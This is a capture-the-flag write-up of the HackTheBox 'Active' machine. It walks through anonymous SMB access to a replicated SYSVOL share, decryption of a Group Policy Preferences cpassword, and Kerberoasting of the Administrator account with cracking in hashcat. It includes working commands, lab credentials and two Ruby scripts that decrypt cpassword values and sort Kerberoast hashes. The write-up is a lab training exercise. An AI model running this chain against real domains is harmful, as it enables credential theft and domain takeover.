HTB — Active
AD · Easy · Windows
Anonymous SMB access to the Replication share (a copy of SYSVOL) leaks a Group Policy Preferences cpassword, which decrypts with the AES key Microsoft published. The recovered service account can Kerberoast the Administrator account, which carries an SPN; cracking that TGS hash gives the domain admin password.
January 10, 2023 · HackTheBox
#AD #GPP #Kerberoasting #SMB
recon

```shell
# full TCP port scan with version detection; -Pn skips host discovery, -oA writes all three output formats
nmap -Pn -sV -p- -T4 10.10.10.100 -oA active
```
Exploitation

smb

```shell
# null-session enumeration: shares, OS info, users
enum4linux -a 10.10.10.100
[+] Attempting to map shares on 10.10.10.100
//10.10.10.100/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Users Mapping: DENIED Listing: N/A Writing: N/A
[+] Got OS info for 10.10.10.100 from srvinfo:
10.10.10.100 Wk Sv PDC Tim NT Domain Controller
platform_id : 500
os version : 6.1
server type : 0x80102b
```

The host is a domain controller (PDC, OS version 6.1 is Windows Server 2008 R2). SYSVOL itself refuses anonymous access, but Replication, a copy of SYSVOL, is listable without credentials. Mirror it:

```shell
# press Enter at the password prompt for a null session; then, at the smb: \> prompt,
# "recurse ON", "prompt OFF" and "mget *" pull the whole share into the current directory
smbclient \\\\10.10.10.100\\Replication
```
```shell
# move the GPO GUID directories under ./Policies and walk them
mv \{* ./Policies
ls -lR
total 8
drwxr-xr-x 5 root root 4096 Aug 25 14:28 {31B2F340-016D-11D2-945F-00C04FB984F9}
drwxr-xr-x 4 root root 4096 Aug 25 14:28 {6AC1786C-016F-11D2-945F-00C04fB984F9}
./{31B2F340-016D-11D2-945F-00C04FB984F9}:
total 16
-rw-r--r-- 1 root root 23 Aug 25 14:28 GPT.INI
drwxr-xr-x 2 root root 4096 Aug 25 14:28 'Group Policy'
drwxr-xr-x 4 root root 4096 Aug 25 14:28 MACHINE
drwxr-xr-x 2 root root 4096 Aug 25 14:28 USER
'./{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy':
total 4
-rw-r--r-- 1 root root 119 Aug 25 14:28 GPE.INI
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE:
total 12
drwxr-xr-x 3 root root 4096 Aug 25 14:28 Microsoft
drwxr-xr-x 3 root root 4096 Aug 25 14:28 Preferences
-rw-r--r-- 1 root root 2788 Aug 25 14:28 Registry.pol
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft:
total 4
drwxr-xr-x 3 root root 4096 Aug 25 14:28 'Windows NT'
'./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT':
total 4
drwxr-xr-x 2 root root 4096 Aug 25 14:28 SecEdit
'./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit':
total 4
-rw-r--r-- 1 root root 1098 Aug 25 14:28 GptTmpl.inf
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences:
total 4
drwxr-xr-x 2 root root 4096 Aug 25 14:28 Groups
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups:
total 4
-rw-r--r-- 1 root root 533 Aug 25 14:28 Groups.xml
./{31B2F340-016D-11D2-945F-00C04FB984F9}/USER:
total 0
./{6AC1786C-016F-11D2-945F-00C04fB984F9}:
total 12
-rw-r--r-- 1 root root 22 Aug 25 14:28 GPT.INI
drwxr-xr-x 3 root root 4096 Aug 25 14:28 MACHINE
drwxr-xr-x 2 root root 4096 Aug 25 14:28 USER
./{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE:
total 4
drwxr-xr-x 3 root root 4096 Aug 25 14:28 Microsoft
./{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft:
total 4
drwxr-xr-x 3 root root 4096 Aug 25 14:28 'Windows NT'
'./{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT':
total 4
drwxr-xr-x 2 root root 4096 Aug 25 14:28 SecEdit
'./{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit':
total 4
-rw-r--r-- 1 root root 3722 Aug 25 14:28 GptTmpl.inf
./{6AC1786C-016F-11D2-945F-00C04fB984F9}/USER:
total 0
```

{31B2F340-016D-11D2-945F-00C04FB984F9} is the Default Domain Policy and {6AC1786C-016F-11D2-945F-00C04fB984F9} the Default Domain Controllers Policy; only the first has a Preferences directory.
```shell
┌──(root㉿kali)-[/home/…/active/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy]
└─# cat GPE.INI
[General]
MachineExtensionVersions=[{17D89FEC-5C44-4972-B12D-241CAEF74509}{79F92669-4224-476C-9C5C-6EFB4D87DF4A}:10]
```

GPE.INI records which Group Policy Preferences client-side extensions the GPO uses; {17D89FEC-5C44-4972-B12D-241CAEF74509} is the Local Users and Groups extension, which is why MACHINE/Preferences/Groups/Groups.xml is the file to read.

```shell
┌──(root㉿kali)-[/home/…/MACHINE/Microsoft/Windows NT/SecEdit]
└─# cat GptTmpl.inf
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 42
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
[Version]
signature="$CHICAGO$"
Revision=1
```

GptTmpl.inf is the domain's security template. LockoutBadCount = 0 means no account lockout, so password guessing against domain accounts carries no lockout risk; MinimumPasswordLength = 7 with complexity on tells you what a cracked password must at least look like.

```shell
┌──(root㉿kali)-[/home/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
```

Groups.xml is a Local Users and Groups preference item (action="U", update) that sets a password for active.htb\SVC_TGS. The cpassword attribute is that password, AES-256 encrypted with a key Microsoft published in MS-GPPREF, so it is effectively cleartext for anyone who can read the share.
```shell
┌──(root㉿kali)-[/home/…/active/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE]
└─# gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
```

MS14-025 stopped the Group Policy editor from writing new cpassword values, but it did not remove existing ones from SYSVOL, which is why a 2018 policy on a 2008 R2 DC still hands out the password.

Aside kept from the original notes (not part of this chain; samba-tool can also load policy content into a GPO once you hold credentials):

```shell
samba-tool gpo load -UAdministrator --content=test.json
```

- can authenticate to SMB with the recovered credentials:
SVC_TGS:GPPstillStandingStrong2k18

```shell
smbclient \\\\10.10.10.100\\Users -U SVC_TGS
```

- next, try the same credentials as Administrator and against C$ with smbclient.
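What gpp-decrypt is doing under the hood, as an added example (this is not the page's code and not the gpp-decrypt tool itself): restore the base64 padding that GPP strips, AES-256-CBC decrypt with the key from MS-GPPREF and a zero IV, and decode the UTF-16LE result. The XML is the Groups.xml from the share above, embedded here as a constructed string; the extra attribute names (runAs, accountName, username) cover the other GPP files that carry cpassword (ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml), so the same scan works on a full SYSVOL mirror.

```ruby
require 'openssl'

# AES-256 key from MS-GPPREF 2.2.1.1.4; Microsoft published it, so cpassword
# is obfuscation, not protection.
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*').freeze

# Constructed sample: the Groups.xml pulled from the Replication share
# (same cpassword as on the page).
GROUPS_XML = <<~'XML'
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
  </Groups>
XML

# Decrypt one cpassword value: GPP strips the '=' padding from the base64, so put
# it back; then AES-256-CBC with the public key and an all-zero IV. The plaintext
# is UTF-16LE with PKCS#7 padding, which cipher.final removes.
def gpp_decrypt(cpassword)
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  ciphertext = padded.unpack1('m0')                 # strict base64 decode
  raise ArgumentError, 'cpassword is not a whole number of AES blocks' unless (ciphertext.bytesize % 16).zero?
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv = "\x00" * 16
  plain = cipher.update(ciphertext) + cipher.final
  plain.force_encoding('UTF-16LE').encode('UTF-8')
end

# Walk every <Properties> element that carries a non-empty cpassword and return
# [account, cleartext] pairs; the account attribute name differs per GPP file type.
def gpp_creds(xml)
  xml.scan(/<Properties\b([^>]*)>/).filter_map do |(attrs)|
    cpw = attrs[/\bcpassword="([^"]*)"/, 1]
    next if cpw.nil? || cpw.empty?
    account = attrs[/\b(?:userName|runAs|accountName|username)="([^"]*)"/, 1]
    [account, gpp_decrypt(cpw)]
  end
end

if __FILE__ == $PROGRAM_NAME
  gpp_creds(GROUPS_XML).each { |account, pw| puts "#{account}:#{pw}" }
end
```

Run it with `ruby gpp.rb` and it prints `active.htb\SVC_TGS:GPPstillStandingStrong2k18`, the same value gpp-decrypt gave above. Pointing `gpp_creds` at each .xml under a SYSVOL mirror is the quickest way to check a real domain for leftover cpassword entries.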
Priv Esc

- list the domain accounts that carry an SPN, from a Linux host, with Impacket's GetUserSPNs.py authenticated as SVC_TGS:

```shell
python3 /opt/windows/GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-08-25 14:01:52.043775
```

The only SPN in the domain, active/CIFS:445, is registered on the Administrator account. Any authenticated domain user can ask the KDC for a service ticket to that SPN, and the ticket's encrypted part is keyed from the Administrator's password, so it can be attacked offline.

- request (-request) a TGS for every SPN and print the tickets in hashcat format for offline processing:
```shell
python3 /opt/windows/GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/SVC_TGS -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-08-25 14:01:52.043775
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f27b0200...$02b2f18b38e860c17bbacc944bdfeaf28f7f315a576a34b43c22685d1e8b8c0c22951e651ca2757e75bdd5974e7bd5e70aaad21f0547c6b537105d859c2ebd54718bed15ac8636b105afac7ba717c4d197c40ea03e4081ad2984c11276caf6e97870c04d4da71505a8e41fd6200aed9bb9b874af78c7b67b77124c89fb50a0dbd6ca6aa4ad582ecc4f0473fc35e209cee0ec64395eed9aa97c12f3a563c73b7cf03d553b3a476d764151b57afbb2ed7f7bd19dbf6abc55acaa1f0997c867ba597fcc7304d61ed8d4adfd528e7e454a165f186d5fb138448e84b6a2a00ae188fe5870d5618c1a45c58caff4d3fc917e538770fb9319506ea11620b53e084ebf6b0c6dba8b39fe19c6b0883238d1e1f856dec6215ac5159d3804997317ad63ff7d1b0e6ac4239738a148764278e7787ae63b095fff5ac4987797eb7f6a24ef4d731237c396f8fc52ddc9e99f03c1c46b76c221cbbf6a9e3787e7fe8aa0770b696251219bbb0f81d5ab04821ab2a9fed1eee4ea4b157acedb62c2ef3acdafe2181648ecde389e8b6599ee87b6282eba9bf891bbe74005f1af08f5e1245c10ff20aeda8659b40be89e0720edd992bbee9102baa2f661064fc7c0f4115d11a5dcb8b9c28f83141cd9d009bb1830c7fd1c4d170e4ccc74729419f1f183febc4d4dafd1302f8fd6a92f595e3b4a2538d4eeb866a37586613aa85b4e7524331438fedca9a440c659cae424d8bb8d745a14e41c3b403cc35cc119683708c4bd302e3f16e21cfe094ec935539ffe66187d1722a1b178e586c53a5f1b050884afeef7d5dcfc086db0973873efd6506b8167ab26b94e62a6177c733f7c5497a0aa2360d7bca6b7f615e81b1a637f8283d91765ed8f9bfaaf32a2456f83c8a195266a82c0ff21cbda2720649dc9226dce653e70f83ff955b5696e1c885489f74d80d28b02c4ba4adb8d49ff4b7cac4f06ed5754ca117259597781aa7170dd96a0b673fcd973268b720c7b8ccb32fbdd31e6d5c1e5d2d7184d295ca0953fcc725a2cda5a458555062f1e911c1f0f96225f4bb8d9fdc54b407e7b6634e27a0e0814c7d1835a723d9d422b27b1091c96002483d19a2ebcaef80c518d87d598cb1f1fbc259c842f1877230fa68d407975792b79fa59fa090c3ac414b3e16bf99d3709b5b146b4a880d7343e6f4cbb2477cab72f54067e884a8fd54337be6799eb57e7110762fa883d07659087282f1f21bfb5a4a23d205ff1f34bdc8e333d722447cd
```

- crack the TGS-REP hash (etype 23, RC4-HMAC, hashcat mode 13100) offline with rockyou:
```shell
# the $krb5tgs$23$ line from the previous step saved as ./administrator_tgs
hashcat -m 13100 ./administrator_tgs /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f27b0200...$…:Ticketmaster1968
```

- credentials:
Administrator:Ticketmaster1968

```shell
smbclient \\\\10.10.10.100\\C$ -U Administrator
Password for [WORKGROUP\Administrator]:Ticketmaster1968
smb: \Users\Administrator\Desktop\> get root.txt
```

```shell
┌──(root㉿kali)-[/home/sake/htb-labs/active]
└─# cat root.txt
b6ac38e0...
```
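The hashcat mode above is tied to the etype in the hash, and on a real engagement GetUserSPNs.py -request usually returns a mix of RC4 (23) and AES (17/18) tickets. As an added example (not the writeup's code, nor Impacket's or hashcat's), this parses the $krb5tgs$ format, rejects mangled lines, and groups the tickets per hashcat mode with RC4 first, since an RC4 guess costs an MD4 plus a few HMAC-MD5/RC4 operations while an AES guess needs PBKDF2-HMAC-SHA1 with 4096 iterations. The sample lines are constructed: the checksum and ticket bytes are filler, and the svc_sql account and MSSQLSvc SPN are invented for illustration.

```ruby
# hashcat modes for Kerberos 5 TGS-REP hashes, keyed by encryption type
HASHCAT_MODE = { 23 => 13100, 17 => 19600, 18 => 19700 }.freeze
# expected checksum field length in hex chars: HMAC-MD5 (16 bytes) for RC4-HMAC,
# truncated HMAC-SHA1 (12 bytes) for the AES etypes
CHECKSUM_HEX = { 23 => 32, 17 => 24, 18 => 24 }.freeze

KrbTgs = Struct.new(:etype, :user, :realm, :spn, :checksum, :edata, keyword_init: true)

# $krb5tgs$<etype>$<user/realm/spn block>$<checksum hex>$<ticket enc-part hex>
HASH_RE = /\A\$krb5tgs\$(\d+)\$(.+)\$([0-9a-f]+)\$([0-9a-f]+)\z/i

def parse_krb5tgs(line)
  m = HASH_RE.match(line.strip)
  return nil unless m
  etype = m[1].to_i
  return nil unless HASHCAT_MODE.key?(etype)
  # the middle block is "*user$realm$spn*" for etype 23 and "user$realm$*spn*"
  # for 17/18; dropping the asterisks turns both into "user$realm$spn"
  user, realm, spn = m[2].delete('*').split('$', 3)
  ticket = KrbTgs.new(etype: etype, user: user, realm: realm, spn: spn,
                      checksum: m[3].downcase, edata: m[4].downcase)
  # a checksum of the wrong length means a mangled copy-paste, not a ticket
  return nil unless ticket.checksum.length == CHECKSUM_HEX[etype] && ticket.edata.length.even?
  ticket
end

# Split -request output into one list per hashcat mode, RC4 (13100) first.
def group_for_hashcat(lines)
  lines.filter_map { |l| parse_krb5tgs(l) }
       .group_by { |t| HASHCAT_MODE[t.etype] }
       .sort_by { |mode, _| mode == 13100 ? 0 : 1 }
       .to_h
end

# Constructed samples (checksum and ticket bytes are filler, not real Kerberos
# material); the first mirrors the Administrator line from the page.
SAMPLE_LINES = [
  "$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$#{'f27b0200' * 4}$#{'ab' * 64}",
  "$krb5tgs$18$svc_sql$ACTIVE.HTB$*MSSQLSvc/db.active.htb:1433*$#{'11' * 12}$#{'cd' * 64}",
  "$krb5tgs$23$*broken$ACTIVE.HTB$http/web*$#{'00' * 8}$#{'ab' * 64}",
  '[-] CCache file is not found. Skipping...',
].freeze

if __FILE__ == $PROGRAM_NAME
  group_for_hashcat(SAMPLE_LINES).each do |mode, tickets|
    puts "hashcat -m #{mode}: #{tickets.map { |t| "#{t.user}@#{t.realm} (#{t.spn})" }.join(', ')}"
  end
end
```

Feeding the real -request output through `group_for_hashcat` and writing each list to its own file gives you one hashcat run per mode; the Administrator ticket lands in the 13100 list, which is the one worth starting with.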